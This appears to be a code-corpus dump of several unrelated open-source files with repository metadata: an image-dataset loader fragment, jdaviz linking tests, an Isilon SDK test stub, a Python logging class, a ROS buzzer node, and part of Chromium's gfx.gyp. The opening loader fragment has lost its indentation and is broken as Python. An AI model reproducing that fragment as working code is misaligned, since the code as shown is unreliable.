s = s * np.clip(np.random.randn()*sf + 1, 1 - sf, 1 + sf)
c[0] += img.shape[1] * np.clip(np.random.randn()*cf, -2*cf, 2*cf)
c[1] += img.shape[0] * np.clip(np.random.randn()*cf, -2*cf, 2*cf)
if np.random.random() < self.opt.flip:
flipped = True
img = img[:, ::-1, :]
trans_input = get_affine_transform(
c, s, 0, [self.opt.input_res, self.opt.input_res])
inp = cv2.warpAffine(img, trans_input,
(self.opt.input_res, self.opt.input_res),
flags=cv2.INTER_LINEAR)
inp = (inp.astype(np.float32) / 255.)
if self.split == 'train' and not self.opt.no_color_aug:
color_aug(self._data_rng, inp, self._eig_val, self._eig_vec)
inp = (inp - self.mean) / self.std
inp = inp.transpose(2, 0, 1)
output_res = self.opt.output_res
num_classes = self.opt.num_classes
trans_output = get_affine_transform(c, s, 0, [output_res, output_res])
num_hm = 1 if self.opt.agnostic_ex else num_classes
hm_t = np.zeros((num_hm, output_res, output_res), dtype=np.float32)
hm_l = np.zeros((num_hm, output_res, output_res), dtype=np.float32)
hm_b = np.zeros((num_hm, output_res, output_res), dtype=np.float32)
hm_r = np.zeros((num_hm, output_res, output_res), dtype=np.float32)
hm_c = np.zeros((num_classes, output_res, output_res), dtype=np.float32)
reg_t = np.zeros((self.max_objs, 2), dtype=np.float32)
reg_l = np.zeros((self.max_objs, 2), dtype=np.float32)
reg_b = np.zeros((self.max_objs, 2), dtype=np.float32)
reg_r = np.zeros((self.max_objs, 2), dtype=np.float32)
ind_t = np.zeros((self.max_objs), dtype=np.int64)
ind_l = np.zeros((self.max_objs), dtype=np.int64)
ind_b = np.zeros((self.max_objs), dtype=np.int64)
ind_r = np.zeros((self.max_objs), dtype=np.int64)
reg_mask = np.zeros((self.max_objs), dtype=np.uint8)
ann_ids = self.coco.getAnnIds(imgIds=[img_id])
anns = self.coco.loadAnns(ids=ann_ids)
num_objs = min(len(anns), self.max_objs)
draw_gaussian = draw_msra_gaussian if self.opt.mse_loss else \
draw_umich_gaussian
for k in range(num_objs):
ann = anns[k]
# bbox = self._coco_box_to_bbox(ann['bbox'])
# tlbr
pts = np.array(ann['extreme_points'], dtype=np.float32).reshape(4, 2)
# cls_id = int(self.cat_ids[ann['category_id']] - 1) # bug
cls_id = int(self.cat_ids[ann['category_id']])
hm_id = 0 if self.opt.agnostic_ex else cls_id
if flipped:
pts[:, 0] = width - pts[:, 0] - 1
pts[1], pts[3] = pts[3].copy(), pts[1].copy()
for j in range(4):
pts[j] = affine_transform(pts[j], trans_output)
pts = np.clip(pts, 0, self.opt.output_res - 1)
h, w = pts[2, 1] - pts[0, 1], pts[3, 0] - pts[1, 0]
if h > 0 and w > 0:
radius = gaussian_radius((math.ceil(h), math.ceil(w)))
radius = max(0, int(radius))
pt_int = pts.astype(np.int32)
draw_gaussian(hm_t[hm_id], pt_int[0], radius)
draw_gaussian(hm_l[hm_id], pt_int[1], radius)
draw_gaussian(hm_b[hm_id], pt_int[2], radius)
draw_gaussian(hm_r[hm_id], pt_int[3], radius)
reg_t[k] = pts[0] - pt_int[0]
reg_l[k] = pts[1] - pt_int[1]
reg_b[k] = pts[2] - pt_int[2]
reg_r[k] = pts[3] - pt_int[3]
ind_t[k] = pt_int[0, 1] * output_res + pt_int[0, 0]
ind_l[k] = pt_int[1, 1] * output_res + pt_int[1, 0]
ind_b[k] = pt_int[2, 1] * output_res + pt_int[2, 0]
ind_r[k] = pt_int[3, 1] * output_res + pt_int[3, 0]
ct = [int((pts[3, 0] + pts[1, 0]) / 2), int((pts[0, 1] + pts[2, 1]) / 2)]
draw_gaussian(hm_c[cls_id], ct, radius)
reg_mask[k] = 1
ret = {'input': inp, 'hm_t': hm_t, 'hm_l': hm_l, 'hm_b': hm_b,
'hm_r': hm_r, 'hm_c': hm_c}
if self.opt.reg_offset:
ret.update({'reg_mask': reg_mask,
'reg_t': reg_t, 'reg_l': reg_l, 'reg_b': reg_b, 'reg_r': reg_r,
'ind_t': ind_t, 'ind_l': ind_l, 'ind_b': ind_b, 'ind_r': ind_r})
return ret
| 41.985401
| 90
| 0.615612
|
4d587eb7173c425b549b12d75c283debaf7c4062
| 7,672
|
py
|
Python
|
jdaviz/configs/imviz/tests/test_linking.py
|
check-spelling/jdaviz
|
bfd0514d13bdc6fa0b8c8536a603293409270337
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
jdaviz/configs/imviz/tests/test_linking.py
|
check-spelling/jdaviz
|
bfd0514d13bdc6fa0b8c8536a603293409270337
|
[
"MIT",
"BSD-3-Clause"
] | 3
|
2021-05-06T13:03:37.000Z
|
2021-12-02T14:51:48.000Z
|
jdaviz/configs/imviz/tests/test_linking.py
|
rosteen/jdaviz
|
e02c08d68ef71c5e40600785f46e65e5ae95e236
|
[
"MIT",
"BSD-3-Clause"
] | 1
|
2021-12-27T04:24:34.000Z
|
2021-12-27T04:24:34.000Z
|
import pytest
from astropy.table import Table
from glue.core.link_helpers import LinkSame
from glue.plugins.wcs_autolinking.wcs_autolinking import OffsetLink, WCSLink
from numpy.testing import assert_allclose
from regions import PixCoord, CirclePixelRegion
from jdaviz.configs.imviz.helper import get_reference_image_data
from jdaviz.configs.imviz.tests.utils import BaseImviz_WCS_NoWCS, BaseImviz_WCS_WCS
class BaseLinkHandler:
def check_all_pixel_links(self):
links = self.imviz.app.data_collection.external_links
assert len(links) == 2
assert all([isinstance(link, LinkSame) for link in links])
def test_pixel_linking(self):
self.imviz.link_data(link_type='pixels', error_on_fail=True)
self.check_all_pixel_links()
class TestLink_WCS_NoWCS(BaseImviz_WCS_NoWCS, BaseLinkHandler):
def test_wcslink_fallback_pixels(self):
self.imviz.link_data(link_type='wcs', error_on_fail=True)
self.check_all_pixel_links()
assert self.viewer.get_link_type('has_wcs[SCI,1]') == 'self'
assert self.viewer.get_link_type('no_wcs[SCI,1]') == 'pixels'
# Also check the coordinates display
self.viewer.on_mouse_or_key_event({'event': 'mousemove', 'domain': {'x': 0, 'y': 0}})
assert self.viewer.label_mouseover.pixel == 'x=00.0 y=00.0'
assert self.viewer.label_mouseover.value == '+0.00000e+00 '
assert self.viewer.label_mouseover.world_ra_deg == '337.5202808000'
assert self.viewer.label_mouseover.world_dec_deg == '-20.8333330600'
# Not sure why but need one extra blink to work properly.
# This does not happen when we load real data from files.
self.viewer.blink_once()
self.viewer.on_mouse_or_key_event({'event': 'keydown', 'key': 'b',
'domain': {'x': 0, 'y': 0}})
assert self.viewer.label_mouseover.pixel == 'x=00.0 y=00.0'
assert self.viewer.label_mouseover.value == '+0.00000e+00 '
assert self.viewer.label_mouseover.world_ra_deg == ''
assert self.viewer.label_mouseover.world_dec_deg == ''
def test_wcslink_nofallback_noerror(self):
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme=None)
self.check_all_pixel_links() # Keeps old links because operation failed silently
def test_wcslink_nofallback_error(self):
with pytest.raises(AttributeError, match='pixel_n_dim'):
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme=None, error_on_fail=True)
class TestLink_WCS_WCS(BaseImviz_WCS_WCS, BaseLinkHandler):
def test_wcslink_affine_with_extras(self):
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme=None, error_on_fail=True)
links = self.imviz.app.data_collection.external_links
assert len(links) == 1
assert isinstance(links[0], OffsetLink)
assert self.viewer.get_link_type('has_wcs_2[SCI,1]') == 'wcs'
# Customize display on second image (last loaded).
self.viewer.set_colormap('viridis')
self.viewer.stretch = 'sqrt'
self.viewer.cuts = (0, 100)
# Add subsets, both interactive and static.
self.imviz._apply_interactive_region('bqplot:circle', (1.5, 2.5), (3.6, 4.6))
self.imviz.load_static_regions({
'my_reg': CirclePixelRegion(center=PixCoord(x=6, y=2), radius=5)})
# Add markers.
tbl = Table({'x': (0, 0), 'y': (0, 1)})
self.viewer.add_markers(tbl, marker_name='xy_markers')
assert 'xy_markers' in self.imviz.app.data_collection.labels
# Run linking again, does not matter what kind.
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme=None, error_on_fail=True)
# Ensure display is still customized.
assert self.viewer.state.layers[1].cmap.name == 'viridis'
assert self.viewer.state.layers[1].stretch == 'sqrt'
assert_allclose((self.viewer.state.layers[1].v_min, self.viewer.state.layers[1].v_max),
(0, 100))
# Ensure subsets are still there.
assert 'Subset 1' in self.imviz.get_interactive_regions()
assert 'my_reg' in [layer.layer.label for layer in self.viewer.state.layers]
# Ensure markers are deleted.
# Zoom and pan will reset in this case, so we do not check those.
assert 'xy_markers' not in self.imviz.app.data_collection.labels
assert len(self.viewer._marktags) == 0
# Pan/zoom.
self.viewer.center_on((5, 5))
self.viewer.zoom_level = 0.789
ans = (self.viewer.state.x_min, self.viewer.state.y_min,
self.viewer.state.x_max, self.viewer.state.y_max)
# Run linking again, does not matter what kind.
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme=None, error_on_fail=True)
# Ensure pan/zoom does not change when markers are not present.
assert_allclose((self.viewer.state.x_min, self.viewer.state.y_min,
self.viewer.state.x_max, self.viewer.state.y_max), ans)
# Also check the coordinates display
self.viewer.on_mouse_or_key_event({'event': 'mousemove', 'domain': {'x': 0, 'y': 0}})
assert self.viewer.label_mouseover.pixel == 'x=00.0 y=00.0'
assert self.viewer.label_mouseover.value == '+1.00000e+00 '
assert self.viewer.label_mouseover.world_ra_deg == '337.5202808000'
assert self.viewer.label_mouseover.world_dec_deg == '-20.8333330600'
# Not sure why but need one extra blink to work properly.
# This does not happen when we load real data from files.
self.viewer.blink_once()
self.viewer.on_mouse_or_key_event({'event': 'keydown', 'key': 'b',
'domain': {'x': 0, 'y': 0}})
assert self.viewer.label_mouseover.pixel == 'x=01.0 y=-0.0'
assert self.viewer.label_mouseover.value == '+1.00000e+00 '
assert self.viewer.label_mouseover.world_ra_deg == '337.5202808000'
assert self.viewer.label_mouseover.world_dec_deg == '-20.8333330600'
def test_wcslink_fullblown(self):
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme=None, wcs_use_affine=False,
error_on_fail=True)
links = self.imviz.app.data_collection.external_links
assert len(links) == 1
assert isinstance(links[0], WCSLink)
assert self.viewer.get_link_type('has_wcs_1[SCI,1]') == 'self'
assert self.viewer.get_link_type('has_wcs_2[SCI,1]') == 'wcs'
# Also test other exception handling here.
def test_invalid_inputs(self):
with pytest.raises(ValueError, match='link_type'):
self.imviz.link_data(link_type='foo')
with pytest.raises(ValueError, match='wcs_fallback_scheme'):
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme='foo')
with pytest.raises(ValueError, match='not found in data collection external links'):
self.viewer.get_link_type('foo')
def test_imviz_no_data(imviz_app):
with pytest.raises(ValueError, match='No valid reference data'):
get_reference_image_data(imviz_app.app)
imviz_app.link_data(error_on_fail=True) # Just no-op, do not crash
links = imviz_app.app.data_collection.external_links
assert len(links) == 0
with pytest.raises(ValueError, match='No reference data for link look-up'):
imviz_app.default_viewer.get_link_type('foo')
| 45.666667
| 96
| 0.659932
|
f7294b4c8ab15cf32eb5a8981f5001dc4da902e2
| 879
|
py
|
Python
|
isi_sdk_9_0_0/test/test_network_pools.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 24
|
2018-06-22T14:13:23.000Z
|
2022-03-23T01:21:26.000Z
|
isi_sdk_9_0_0/test/test_network_pools.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 46
|
2018-04-30T13:28:22.000Z
|
2022-03-21T21:11:07.000Z
|
isi_sdk_9_0_0/test/test_network_pools.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 29
|
2018-06-19T00:14:04.000Z
|
2022-02-08T17:51:19.000Z
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 10
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_9_0_0
from isi_sdk_9_0_0.models.network_pools import NetworkPools # noqa: E501
from isi_sdk_9_0_0.rest import ApiException
class TestNetworkPools(unittest.TestCase):
"""NetworkPools unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testNetworkPools(self):
"""Test NetworkPools"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_9_0_0.models.network_pools.NetworkPools() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 21.439024
| 81
| 0.697383
|
86f7961555d78ca0ddb6cd92b59fd0248fe8bc7a
| 6,102
|
py
|
Python
|
phk_logger/phkLogger.py
|
proh4cktive/phk-logger
|
e4425124d86ff8fe74e05e2243af4f0ee366a1ca
|
[
"MIT"
] | null | null | null |
phk_logger/phkLogger.py
|
proh4cktive/phk-logger
|
e4425124d86ff8fe74e05e2243af4f0ee366a1ca
|
[
"MIT"
] | null | null | null |
phk_logger/phkLogger.py
|
proh4cktive/phk-logger
|
e4425124d86ff8fe74e05e2243af4f0ee366a1ca
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import errno
import platform
import logging
import logging.handlers
class PHKLogger(object):
"""Simple Logging class
    Allows logging to the standard syslog process, or to a specific file if one is set
"""
def __init__(self, filename=None, level=logging.WARNING, name=None, cli=False, backup=3, when="midnight", pattern=None):
if name is None:
name = __name__
try:
self.level = int(level)
except ValueError:
self.level = logging.INFO
self.logger = logging.getLogger(name)
# Default behavior
if filename is None:
# Set syslog handler
current = platform.system()
if current == 'Linux':
target = '/dev/log'
elif current == 'Darwin':
target = '/var/run/syslog'
else:
                raise NotImplementedError('Sorry, unsupported platform.')
handler = logging.handlers.SysLogHandler(target)
# If filename is set
else:
try:
# Create directory if needed
dirname = os.path.dirname(filename)
if dirname and not os.path.isdir(dirname):
os.makedirs(dirname)
# Create file if needed
if not os.path.isfile(filename):
with open(filename, 'wt') as tmp:
pass
except OSError as err:
raise Exception(err)
try:
# Set a time rotating handler
handler = logging.handlers.TimedRotatingFileHandler(filename, when=when, backupCount=backup)
except IOError:
raise Exception('Unable to set Time Rotating Log file: {f}'.format(f=filename))
if pattern is None:
pattern = '%(name)s %(asctime)s %(levelname)-8s %(message)s'
formatter = logging.Formatter(pattern)
handler.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.setLevel(self.level)
self.cli = cli
def __is_string(self, string):
try:
return isinstance(string, str)
except NameError:
return isinstance(string, basestring)
def debug(self, msg, color=None, light=None):
"""Shortcut to debug message
"""
self.write(msg, level=logging.DEBUG, color=color, light=light)
def info(self, msg, color=None, light=None):
"""Shortcut to info message
"""
self.write(msg, level=logging.INFO, color=color, light=light)
def warning(self, msg, color=None, light=None):
"""Shortcut to warning message
"""
self.write(msg, level=logging.WARNING, color=color, light=light)
def error(self, msg, color=None, light=None):
"""Shortcut to error message
"""
self.write(msg, level=logging.ERROR, color=color, light=light)
def critical(self, msg, color=None, light=None):
"""Shortcut to critical message
"""
self.write(msg, level=logging.CRITICAL, color=color, light=light)
def write(self, message, level=None, color=None, light=None):
"""Accept log message with level set with string or logging int
"""
# Clean message
message = str(message).rstrip()
# Only log if there is a message (not just a new line)
if message == "":
return True
# Autoset level if necessary
if level is None:
level = self.level
# Convert string level to logging int
if self.__is_string(level):
level = level.upper()
if level == "DEBUG":
level = logging.DEBUG
elif level in ["INFO", "INFOS"]:
level = logging.INFO
elif level == "WARNING":
level = logging.WARNING
elif level == "ERROR":
level = logging.ERROR
elif level == "CRITICAL":
level = logging.CRITICAL
else:
level = self.level
        # Output with the correct level
if level == logging.DEBUG:
def_color = "BLUE"
def_light = True
prefix = '*'
self.logger.debug(message)
elif level == logging.INFO:
def_color = "GREEN"
def_light = False
prefix = '+'
self.logger.info(message)
elif level == logging.WARNING:
def_color = "YELLOW"
def_light = False
prefix = '-'
self.logger.warning(message)
elif level == logging.ERROR:
def_color = "RED"
def_light = False
prefix = '!'
self.logger.error(message)
elif level == logging.CRITICAL:
def_color = "RED"
def_light = True
prefix = '!'
self.logger.critical(message)
else:
raise Exception('Invalid log level')
if color is None:
color = def_color
if light is None:
light = def_light
# Output to CLI if cli flag is set
if self.cli:
color = color.upper()
# Position color based on level if not forced
c = '\033[1' if light else '\033[0'
if color == 'BLACK':
c += ';30m'
elif color == 'BLUE':
c += ';34m'
elif color == 'GREEN':
c += ';32m'
elif color == 'CYAN':
c += ';36m'
elif color == 'RED':
c += ';31m'
elif color == 'PURPLE':
c += ';35m'
elif color == 'YELLOW':
c += ';33m'
elif color == 'WHITE':
c += ';37m'
else:
# No Color
c += 'm'
if level >= self.level:
sys.stdout.write("{color}[{p}] {msg}\033[0m\n".format(color=c, p=prefix, msg=message))
| 31.78125
| 124
| 0.51393
|
eedeae9e19234d927155d28128243d5e05b225f5
| 1,139
|
py
|
Python
|
scripts/buzzer.py
|
sugarman1983/pimouse_ros
|
3d0351d225e69fbcde4525a941a1e303b791066c
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/buzzer.py
|
sugarman1983/pimouse_ros
|
3d0351d225e69fbcde4525a941a1e303b791066c
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/buzzer.py
|
sugarman1983/pimouse_ros
|
3d0351d225e69fbcde4525a941a1e303b791066c
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import rospy, actionlib
from std_msgs.msg import UInt16
from pimouse_ros.msg import MusicAction, MusicResult, MusicFeedback
def write_freq(hz=0):
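    # Write the requested frequency (Hz) to the buzzer device file; 0 silences it.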
bfile = "/dev/rtbuzzer0"
try:
with open(bfile, "w") as f:
f.write(str(hz) + "\n")
except IOError:
rospy.logerr("can't write to " + bfile)
def recv_buzzer(data):
write_freq(data.data)
def exec_music(goal):
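    # Play each frequency in goal.freqs for its matching duration (1 s when no
    # duration is given), publishing remaining-step feedback and stopping the
    # buzzer if the action is preempted.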
r = MusicResult()
fb = MusicFeedback()
for i, f in enumerate(goal.freqs):
fb.remaining_steps = len(goal.freqs) - i
music.publish_feedback(fb)
if music.is_preempt_requested():
write_freq(0)
r.finished = False
music.set_preempted(r)
return
write_freq(f)
rospy.sleep(1.0 if i >= len(goal.durations) else goal.durations[i])
r.finished = True
music.set_succeeded(r)
if __name__ == '__main__':
rospy.init_node('buzzer')
rospy.Subscriber("buzzer", UInt16, recv_buzzer)
music = actionlib.SimpleActionServer('music', MusicAction, exec_music, False)
music.start()
rospy.on_shutdown(write_freq)
rospy.spin()
| 25.886364
| 81
| 0.647059
|
2fdd75616b3fd8572572c958aa8dcfbd99a11dc2
| 16,854
|
gyp
|
Python
|
ui/gfx/gfx.gyp
|
iplo/Chain
|
8bc8943d66285d5258fffc41bed7c840516c4422
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 231
|
2015-01-08T09:04:44.000Z
|
2021-12-30T03:03:10.000Z
|
ui/gfx/gfx.gyp
|
JasonEric/chromium
|
c7361d39be8abd1574e6ce8957c8dbddd4c6ccf7
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1
|
2017-02-14T21:55:58.000Z
|
2017-02-14T21:55:58.000Z
|
ui/gfx/gfx.gyp
|
JasonEric/chromium
|
c7361d39be8abd1574e6ce8957c8dbddd4c6ccf7
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 268
|
2015-01-21T05:53:28.000Z
|
2022-03-25T22:09:01.000Z
|
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'targets': [
{
'target_name': 'gfx_geometry',
'type': '<(component)',
'dependencies': [
'<(DEPTH)/base/base.gyp:base',
],
'defines': [
'GFX_IMPLEMENTATION',
],
'sources': [
'geometry/box_f.cc',
'geometry/box_f.h',
'geometry/cubic_bezier.h',
'geometry/cubic_bezier.cc',
'geometry/insets.cc',
'geometry/insets.h',
'geometry/insets_base.h',
'geometry/insets_f.cc',
'geometry/insets_f.h',
'geometry/matrix3_f.cc',
'geometry/matrix3_f.h',
'geometry/point.cc',
'geometry/point.h',
'geometry/point3_f.cc',
'geometry/point3_f.h',
'geometry/point_base.h',
'geometry/point_conversions.cc',
'geometry/point_conversions.h',
'geometry/point_f.cc',
'geometry/point_f.h',
'geometry/quad_f.cc',
'geometry/quad_f.h',
'geometry/rect.cc',
'geometry/rect.h',
'geometry/rect_base.h',
'geometry/rect_base_impl.h',
'geometry/rect_conversions.cc',
'geometry/rect_conversions.h',
'geometry/rect_f.cc',
'geometry/rect_f.h',
'geometry/safe_integer_conversions.h',
'geometry/size.cc',
'geometry/size.h',
'geometry/size_base.h',
'geometry/size_conversions.cc',
'geometry/size_conversions.h',
'geometry/size_f.cc',
'geometry/size_f.h',
'geometry/vector2d.cc',
'geometry/vector2d.h',
'geometry/vector2d_conversions.cc',
'geometry/vector2d_conversions.h',
'geometry/vector2d_f.cc',
'geometry/vector2d_f.h',
'geometry/vector3d_f.cc',
'geometry/vector3d_f.h',
],
},
# TODO(beng): This should either generate its own executable or be part of
# a gfx_unittests executable. Currently it's built as part of
# ui_unittests.
{
'target_name': 'gfx_geometry_unittests',
'type': 'static_library',
'dependencies': [
'<(DEPTH)/base/base.gyp:base',
'<(DEPTH)/base/base.gyp:test_support_base',
'<(DEPTH)/testing/gtest.gyp:gtest',
'gfx_geometry',
],
'sources': [
'geometry/box_unittest.cc',
'geometry/cubic_bezier_unittest.cc',
'geometry/insets_unittest.cc',
'geometry/matrix3_unittest.cc',
'geometry/point_unittest.cc',
'geometry/point3_unittest.cc',
'geometry/quad_unittest.cc',
'geometry/rect_unittest.cc',
'geometry/safe_integer_conversions_unittest.cc',
'geometry/size_unittest.cc',
'geometry/vector2d_unittest.cc',
'geometry/vector3d_unittest.cc',
],
},
{
'target_name': 'gfx',
'type': '<(component)',
'dependencies': [
'<(DEPTH)/base/base.gyp:base',
'<(DEPTH)/base/base.gyp:base_i18n',
'<(DEPTH)/base/base.gyp:base_static',
'<(DEPTH)/base/third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'<(DEPTH)/skia/skia.gyp:skia',
'<(DEPTH)/third_party/icu/icu.gyp:icui18n',
'<(DEPTH)/third_party/icu/icu.gyp:icuuc',
'<(DEPTH)/third_party/libpng/libpng.gyp:libpng',
'<(DEPTH)/third_party/zlib/zlib.gyp:zlib',
'gfx_geometry',
],
# text_elider.h includes ICU headers.
'export_dependent_settings': [
'<(DEPTH)/skia/skia.gyp:skia',
'<(DEPTH)/third_party/icu/icu.gyp:icui18n',
'<(DEPTH)/third_party/icu/icu.gyp:icuuc',
],
'defines': [
'GFX_IMPLEMENTATION',
],
'sources': [
'android/device_display_info.cc',
'android/device_display_info.h',
'android/gfx_jni_registrar.cc',
'android/gfx_jni_registrar.h',
'android/java_bitmap.cc',
'android/java_bitmap.h',
'android/shared_device_display_info.cc',
'android/shared_device_display_info.h',
'android/view_configuration.cc',
'android/view_configuration.h',
'animation/animation.cc',
'animation/animation.h',
'animation/animation_container.cc',
'animation/animation_container.h',
'animation/animation_container_element.h',
'animation/animation_container_observer.h',
'animation/animation_delegate.h',
'animation/linear_animation.cc',
'animation/linear_animation.h',
'animation/multi_animation.cc',
'animation/multi_animation.h',
'animation/slide_animation.cc',
'animation/slide_animation.h',
'animation/throb_animation.cc',
'animation/throb_animation.h',
'animation/tween.cc',
'animation/tween.h',
'blit.cc',
'blit.h',
'break_list.h',
'canvas.cc',
'canvas.h',
'canvas_android.cc',
'canvas_paint_gtk.cc',
'canvas_paint_gtk.h',
'canvas_paint_mac.h',
'canvas_paint_mac.mm',
'canvas_paint_win.cc',
'canvas_paint_win.h',
'canvas_skia.cc',
'canvas_skia_paint.h',
'codec/jpeg_codec.cc',
'codec/jpeg_codec.h',
'codec/png_codec.cc',
'codec/png_codec.h',
'color_analysis.cc',
'color_analysis.h',
'color_profile.cc',
'color_profile.h',
'color_profile_mac.cc',
'color_profile_win.cc',
'color_utils.cc',
'color_utils.h',
'display.cc',
'display.h',
'display_observer.cc',
'display_observer.h',
'favicon_size.cc',
'favicon_size.h',
'font.cc',
'font.h',
'font_fallback_win.cc',
'font_fallback_win.h',
'font_list.cc',
'font_list.h',
'font_list_impl.cc',
'font_list_impl.h',
'font_render_params_android.cc',
'font_render_params_linux.cc',
'font_render_params_linux.h',
'font_smoothing_win.cc',
'font_smoothing_win.h',
'frame_time.h',
'gfx_export.h',
'gfx_paths.cc',
'gfx_paths.h',
'gpu_memory_buffer.cc',
'gpu_memory_buffer.h',
'image/canvas_image_source.cc',
'image/canvas_image_source.h',
'image/image.cc',
'image/image.h',
'image/image_family.cc',
'image/image_family.h',
'image/image_ios.mm',
'image/image_mac.mm',
'image/image_png_rep.cc',
'image/image_png_rep.h',
'image/image_skia.cc',
'image/image_skia.h',
'image/image_skia_operations.cc',
'image/image_skia_operations.h',
'image/image_skia_rep.cc',
'image/image_skia_rep.h',
'image/image_skia_source.h',
'image/image_skia_util_ios.h',
'image/image_skia_util_ios.mm',
'image/image_skia_util_mac.h',
'image/image_skia_util_mac.mm',
'image/image_util.cc',
'image/image_util.h',
'image/image_util_ios.mm',
'interpolated_transform.cc',
'interpolated_transform.h',
'linux_font_delegate.cc',
'linux_font_delegate.h',
'mac/scoped_ns_disable_screen_updates.h',
'native_widget_types.h',
'nine_image_painter.cc',
'nine_image_painter.h',
'ozone/dri/dri_skbitmap.cc',
'ozone/dri/dri_skbitmap.h',
'ozone/dri/dri_surface.cc',
'ozone/dri/dri_surface.h',
'ozone/dri/dri_surface_factory.cc',
'ozone/dri/dri_surface_factory.h',
'ozone/dri/dri_vsync_provider.cc',
'ozone/dri/dri_vsync_provider.h',
'ozone/dri/dri_wrapper.cc',
'ozone/dri/dri_wrapper.h',
'ozone/dri/hardware_display_controller.cc',
'ozone/dri/hardware_display_controller.h',
'ozone/impl/file_surface_factory.cc',
'ozone/impl/file_surface_factory.h',
'ozone/surface_factory_ozone.cc',
'ozone/surface_factory_ozone.h',
'pango_util.cc',
'pango_util.h',
'path.cc',
'path.h',
'path_aura.cc',
'path_gtk.cc',
'path_win.cc',
'path_win.h',
'path_x11.cc',
'path_x11.h',
'platform_font.h',
'platform_font_android.cc',
'platform_font_ios.h',
'platform_font_ios.mm',
'platform_font_mac.h',
'platform_font_mac.mm',
'platform_font_ozone.cc',
'platform_font_pango.cc',
'platform_font_pango.h',
'platform_font_win.cc',
'platform_font_win.h',
'range/range.cc',
'range/range.h',
'range/range_mac.mm',
'range/range_win.cc',
'render_text.cc',
'render_text.h',
'render_text_mac.cc',
'render_text_mac.h',
'render_text_ozone.cc',
'render_text_pango.cc',
'render_text_pango.h',
'render_text_win.cc',
'render_text_win.h',
'scoped_canvas.h',
'scoped_cg_context_save_gstate_mac.h',
'scoped_ns_graphics_context_save_gstate_mac.h',
'scoped_ns_graphics_context_save_gstate_mac.mm',
'scoped_ui_graphics_push_context_ios.h',
'scoped_ui_graphics_push_context_ios.mm',
'screen.cc',
'screen.h',
'screen_android.cc',
'screen_aura.cc',
'screen_gtk.cc',
'screen_ios.mm',
'screen_mac.mm',
'screen_win.cc',
'screen_win.h',
'scrollbar_size.cc',
'scrollbar_size.h',
'selection_model.cc',
'selection_model.h',
'sequential_id_generator.cc',
'sequential_id_generator.h',
'shadow_value.cc',
'shadow_value.h',
'skbitmap_operations.cc',
'skbitmap_operations.h',
'skia_util.cc',
'skia_util.h',
'skia_utils_gtk.cc',
'skia_utils_gtk.h',
'switches.cc',
'switches.h',
'sys_color_change_listener.cc',
'sys_color_change_listener.h',
'text_constants.h',
'text_elider.cc',
'text_elider.h',
'text_utils.cc',
'text_utils.h',
'text_utils_android.cc',
'text_utils_ios.mm',
'text_utils_skia.cc',
'transform.cc',
'transform.h',
'transform_util.cc',
'transform_util.h',
'ui_gfx_exports.cc',
'utf16_indexing.cc',
'utf16_indexing.h',
'vsync_provider.h',
'win/dpi.cc',
'win/dpi.h',
'win/hwnd_util.cc',
'win/hwnd_util.h',
'win/scoped_set_map_mode.h',
'win/singleton_hwnd.cc',
'win/singleton_hwnd.h',
'win/window_impl.cc',
'win/window_impl.h',
'x/x11_atom_cache.cc',
'x/x11_atom_cache.h',
'x/x11_types.cc',
'x/x11_types.h',
],
'conditions': [
['OS=="ios"', {
# iOS only uses a subset of UI.
'sources/': [
['exclude', '^codec/jpeg_codec\\.cc$'],
],
}, {
'dependencies': [
'<(libjpeg_gyp_path):libjpeg',
],
}],
# TODO(asvitkine): Switch all platforms to use canvas_skia.cc.
# http://crbug.com/105550
['use_canvas_skia==1', {
'sources!': [
'canvas_android.cc',
],
}, { # use_canvas_skia!=1
'sources!': [
'canvas_skia.cc',
],
}],
['toolkit_uses_gtk == 1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:gtk',
],
'sources': [
'gtk_native_view_id_manager.cc',
'gtk_native_view_id_manager.h',
'gtk_preserve_window.cc',
'gtk_preserve_window.h',
'gdk_compat.h',
'gtk_compat.h',
'gtk_util.cc',
'gtk_util.h',
'image/cairo_cached_surface.cc',
'image/cairo_cached_surface.h',
'scoped_gobject.h',
],
}],
['OS=="win"', {
'sources': [
'gdi_util.cc',
'gdi_util.h',
'icon_util.cc',
'icon_util.h',
],
# TODO(jschuh): C4267: http://crbug.com/167187 size_t -> int
# C4324 is structure was padded due to __declspec(align()), which is
# uninteresting.
'msvs_disabled_warnings': [ 4267, 4324 ],
}],
['OS=="android"', {
'sources!': [
'animation/throb_animation.cc',
'display_observer.cc',
'selection_model.cc',
],
'dependencies': [
'gfx_jni_headers',
],
'link_settings': {
'libraries': [
'-landroid',
'-ljnigraphics',
],
},
}],
